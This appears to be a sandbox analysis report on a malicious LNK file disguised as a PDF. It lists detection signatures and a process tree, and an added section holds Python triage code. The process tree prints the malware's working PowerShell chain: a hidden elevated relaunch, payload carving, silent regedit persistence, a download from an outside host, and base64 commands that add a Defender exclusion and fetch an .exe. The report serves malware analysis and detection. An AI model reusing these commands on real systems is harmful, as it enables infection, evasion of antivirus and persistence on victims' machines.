Windows Analysis Report
Document.pdf.lnk
Overview
General Information
Detection
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%
Signatures
Antivirus detection for URL or domain
Malicious encrypted Powershell command line found
Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
Creates an autostart registry key pointing to binary in C:\Windows
Creates autostart registry keys with suspicious values (likely registry only malware)
Creates multiple autostart registry keys
Encrypted powershell cmdline option found
Found URL in windows shortcut file (LNK)
Machine Learning detection for sample
Potential dropper URLs found in powershell memory
Powershell creates an autostart link
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious powershell command line found
Uses an obfuscated file name to hide its real file extension (double extension)
Uses regedit.exe to modify the Windows registry
Windows shortcut file (LNK) contains suspicious command line arguments
AV process strings found (often used to terminate AV products)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious Powershell In Registry Run Keys
Sigma detected: Usage Of Web Request Commands And Cmdlets
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
- powershell.exe (PID: 5856 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "& {$currentPath = (Get-Location).Path; Start-Process powershell -WindowStyle Hidden -Verb RunAs -ArgumentList ('-Command Set-Location -Path ''\"' + $currentPath + '\"'' ;$dirPath = Get-Location;Set-Location -Path ''\"' + $dirPath.Path + '\"'' ;$lnkpaths = Get-ChildItem -Path ''\"' + $dirPath.Path + '\"'' -Recurse *.lnk | Where-Object { $_.length -eq 423781 } | Select-Object -ExpandProperty FullName;$lnkpath = if ($lnkpaths -is [array]) {$lnkpaths[0]} else {$lnkpaths};$exeFile = Get-Content $lnkpath -Encoding Byte -TotalCount 423781 -ReadCount 423781;$exePath = Join-Path $env:public ''17399.reg'';Set-Content $exePath ([byte[]]($exeFile | Select-Object -Skip 4901)) -Encoding Byte;Start-Process -FilePath ''regedit'' -ArgumentList ''/s'', $exePath;$a=''http://files.catbox.moe/p1yr9i.pdf'';$d=$env:TEMP + ''\Document.pdf'';Invoke-WebRequest -Uri $a -OutFile $d; Invoke-Item $d')} MD5: 04029E121A0CFA5991749937DD22A1D9)
  - conhost.exe (PID: 4412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  - powershell.exe (PID: 1196 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Set-Location -Path '"C:\Users\user\Desktop"' ;$dirPath = Get-Location;Set-Location -Path '""' ;$lnkpaths = Get-ChildItem -Path '""' -Recurse *.lnk | Where-Object { $_.length -eq 423781 } | Select-Object -ExpandProperty FullName;$lnkpath = if ($lnkpaths -is [array]) {$lnkpaths[0]} else {$lnkpaths};$exeFile = Get-Content $lnkpath -Encoding Byte -TotalCount 423781 -ReadCount 423781;$exePath = Join-Path $env:public '17399.reg';Set-Content $exePath ([byte[]]($exeFile | Select-Object -Skip 4901)) -Encoding Byte;Start-Process -FilePath 'regedit' -ArgumentList '/s', $exePath;$a='http://files.catbox.moe/p1yr9i.pdf';$d=$env:TEMP + '\Document.pdf';Invoke-WebRequest -Uri $a -OutFile $d; Invoke-Item $d MD5: 04029E121A0CFA5991749937DD22A1D9)
    - conhost.exe (PID: 1188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    - regedit.exe (PID: 7288 cmdline: "C:\Windows\regedit.exe" /s C:\Users\Public\17399.reg MD5: 999A30979F6195BF562068639FFC4426)
    - Acrobat.exe (PID: 7360 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\Document.pdf MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
      - AcroCEF.exe (PID: 7552 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
      - AcroCEF.exe (PID: 7800 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2084 --field-trial-handle=1720,i,67177622323241092,908084778299603848,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
- svchost.exe (PID: 7624 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- powershell.exe (PID: 8156 cmdline: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -W Hidden -e JABjAHUAcgByAGUAbgB0AEQAcgBpAHYAZQAgAD0AIAAoAEcAZQB0AC0ATABvAGMAYQB0AGkAbwBuACAAfAAgAFMAcABsAGkAdAAtAFAAYQB0AGgAIAAtAFEAdQBhAGwAaQBmAGkAZQByACkAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA MD5: 04029E121A0CFA5991749937DD22A1D9)
  - conhost.exe (PID: 5260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 6012 cmdline: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -W Hidden -e JABhAD0AJwBoAHQAdABwADoALwAvAHIAYQB3AC4AZwBpAHQAaAB1AGIAdQBzAGUAcgBjAG8AbgB0AGUAbgB0AC4AYwBvAG0ALwBNAHkAUAByAGkAbgBjAGUAcwBzAEEAawBpAHIAYQAvAEoAYQByAHYAYQBzAC8AbQBhAGkAbgAvAEEAbABlAGoALgBlAHgAZQAnADsAJABkAD0AIgAkACgAJABlAG4AdgA6AFQARQB MD5: 04029E121A0CFA5991749937DD22A1D9)
  - conhost.exe (PID: 5144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cleanup
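The command lines in the process tree above carry the whole chain: the LNK's PowerShell relaunches itself hidden and elevated (-Verb RunAs), locates the .lnk on disk by its exact size (423781 bytes), writes everything after byte 4901 of that file to C:\Users\Public\17399.reg, imports it silently with regedit /s, then downloads and opens a decoy PDF. The two later PowerShell instances run -e scripts (base64 of UTF-16LE) that the report cuts off at 235 characters. What follows is an added example, not part of the report, the sample or the sandbox: Python triage helpers that decode those blobs despite the truncation, pull the carve offsets out of the stage-1 command line, replicate the carve on a constructed stand-in LNK (the report contains neither the LNK nor the .reg, so the carrier bytes and the .reg body are placeholders), and apply the resulting checks to the report's own command lines. The LNK header constant is the standard Shell Link signature; the offsets, the regedit command line and the two blobs are copied from the tree above. Decoding the blobs with it shows an Add-MpPreference -ExclusionPath call and a URL for an .exe on raw.githubusercontent.com, which is what the MpPreference and dropper-URL signatures listed above are keying on.

```python
"""Added triage helpers for the LNK -> PowerShell -> regedit chain in this report.
Not part of the report or the sample: offsets, the regedit command line and the
two -e blobs are copied from the process tree; build_sample_carrier() is a
constructed stand-in, since the report contains neither the LNK nor the .reg."""
import base64
import re

# Shell Link header: HeaderSize 0x4C, then CLSID {00021401-0000-0000-C000-000000000046}.
LNK_MAGIC = (b"\x4c\x00\x00\x00"
             b"\x01\x14\x02\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46")

# Tail of the stage-1 command line (PID 1196), verbatim from the report.
STAGE1_EXCERPT = (
    "$exeFile = Get-Content $lnkpath -Encoding Byte -TotalCount 423781 "
    "-ReadCount 423781;$exePath = Join-Path $env:public '17399.reg';"
    "Set-Content $exePath ([byte[]]($exeFile | Select-Object -Skip 4901)) "
    "-Encoding Byte;Start-Process -FilePath 'regedit' -ArgumentList '/s', $exePath;"
    "$a='http://files.catbox.moe/p1yr9i.pdf';$d=$env:TEMP + '\\Document.pdf';"
    "Invoke-WebRequest -Uri $a -OutFile $d; Invoke-Item $d"
)
REGEDIT_7288 = r'"C:\Windows\regedit.exe" /s C:\Users\Public\17399.reg'
POWERSHELL = '"C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\PowerShell.exe" -W Hidden -e '
# -e arguments of PIDs 8156 and 6012 as the report truncates them (235 base64
# characters each, so the final 4-character group is incomplete).
ENCODED_8156 = ("JABjAHUAcgByAGUAbgB0AEQAcgBpAHYAZQAgAD0AIAAoAEcAZQB0AC0ATABvAGMA"
                "YQB0AGkAbwBuACAAfAAgAFMAcABsAGkAdAAtAFAAYQB0AGgAIAAtAFEAdQBhAGwA"
                "aQBmAGkAZQByACkAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUA"
                "IAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA")
ENCODED_6012 = ("JABhAD0AJwBoAHQAdABwADoALwAvAHIAYQB3AC4AZwBpAHQAaAB1AGIAdQBzAGUA"
                "cgBjAG8AbgB0AGUAbgB0AC4AYwBvAG0ALwBNAHkAUAByAGkAbgBjAGUAcwBzAEEA"
                "awBpAHIAYQAvAEoAYQByAHYAYQBzAC8AbQBhAGkAbgAvAEEAbABlAGoALgBlAHgA"
                "ZQAnADsAJABkAD0AIgAkACgAJABlAG4AdgA6AFQARQB")

def decode_encoded_command(blob: str) -> str:
    """Decode a powershell -e argument (base64 of UTF-16LE), tolerating report truncation."""
    b64 = re.sub(r"\s+", "", blob)        # report viewers chunk the blob with spaces
    if len(b64) % 4 == 1:                 # a lone trailing char carries less than a byte
        b64 = b64[:-1]
    b64 += "=" * (-len(b64) % 4)          # restore the padding the cut removed
    raw = base64.b64decode(b64)
    return raw[: len(raw) - len(raw) % 2].decode("utf-16-le")  # drop an odd last byte

_CARVE = re.compile(r"-TotalCount\s+(\d+).*?Select-Object\s+-Skip\s+(\d+)", re.S)

def payload_offsets(script: str):
    """(skip, total) from the Get-Content/Select-Object carving idiom, else None."""
    m = _CARVE.search(script)
    return (int(m.group(2)), int(m.group(1))) if m else None

def is_expected_carrier(lnk: bytes, total: int) -> bool:
    """The script picks its carrier by exact size ($_.length -eq 423781); mirror that."""
    return len(lnk) == total and lnk.startswith(LNK_MAGIC)

def carve_payload(lnk: bytes, skip: int, total: int) -> bytes:
    """Mirror `Get-Content -Encoding Byte -TotalCount $total | Select-Object -Skip $skip`."""
    if not is_expected_carrier(lnk, total):
        raise ValueError("size or header mismatch: not the LNK this script was built for")
    return lnk[skip:total]

def build_sample_carrier(skip: int = 64) -> bytes:
    """Constructed carrier: LNK header, zero filler, then a placeholder .reg body."""
    reg = (b"Windows Registry Editor Version 5.00\r\n\r\n"
           b"[HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run]\r\n"
           b"\"placeholder\"=\"C:\\\\Windows\\\\placeholder.exe\"\r\n")  # not the sample's data
    return LNK_MAGIC.ljust(skip, b"\x00") + reg

_ENC = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+(\S+)", re.I)
_REG = re.compile(r'regedit(?:\.exe)?"?\s+/s\s+\S*\\Users\\Public\\', re.I)
_PATTERNS = {  # what the report's Sigma hits key on, checked on the decoded script
    "defender-exclusion": r"Add-MpPreference\s+-Exclusion",
    "web-download": r"Invoke-WebRequest|DownloadFile|DownloadString",
    "url": r"https?://",
}

def triage_flags(cmdline: str) -> set:
    """Flag a process command line, decoding -e first so the checks see the script."""
    m = _ENC.search(cmdline)
    script = decode_encoded_command(m.group(1)) if m else cmdline
    flags = {"encoded-command"} if m else set()
    flags |= {name for name, pat in _PATTERNS.items() if re.search(pat, script, re.I)}
    if payload_offsets(script):
        flags.add("carves-appended-payload")
    if _REG.search(cmdline):
        flags.add("silent-reg-import-from-public")
    return flags

if __name__ == "__main__":
    for pid, blob in (("8156", ENCODED_8156), ("6012", ENCODED_6012)):
        print(pid, decode_encoded_command(blob))
    lnk = build_sample_carrier()
    print(payload_offsets(STAGE1_EXCERPT), carve_payload(lnk, 64, len(lnk))[:36])
    for c in (POWERSHELL + ENCODED_8156, POWERSHELL + ENCODED_6012, STAGE1_EXCERPT, REGEDIT_7288):
        print(sorted(triage_flags(c)))
```

The size check in carve_payload is deliberate: because the stage-1 script selects its carrier with `$_.length -eq 423781`, any LNK that has been re-saved, re-signed or padded will silently break the chain, and the same exact-size match is a cheap hunting pivot for other copies of this lure. The decoder drops a lone trailing base64 character rather than failing, which is what you want when the blob comes from a report that cuts the argument off mid-group.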
No configs have been found
No YARA matches
System Summary
Sigma rule sources:
- Author: Florian Roth (Nextron Systems)
- Author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community
- Author: Nasreddine Bencherchali (Nextron Systems)